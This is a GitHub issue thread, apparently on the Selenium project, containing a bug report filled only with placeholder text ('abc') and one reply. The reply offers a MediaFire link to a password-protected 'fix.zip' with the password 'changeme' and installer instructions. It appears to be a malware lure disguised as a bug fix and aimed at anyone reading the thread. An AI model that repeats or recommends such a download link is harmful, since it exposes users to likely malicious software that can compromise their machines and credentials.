### ISSUE TITLE
[🐛 Bug]: eservice

### ISSUE THREAD

**Issue by hongnhung25102002** [SeleniumHQ/selenium#14456]
### What happened?

abc

### How can we reproduce the issue?

```shell
abc
```

### Relevant log output

```shell
abc
```

### Operating System

windows10

### Selenium version

java 4.0.0

### What are the browser(s) and version(s) where you see this issue?

chrome 90

### What are the browser driver(s) and version(s) where you see this issue?

chrome drive 94.0.4606.61

### Are you using Selenium Grid?

4.0.0

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
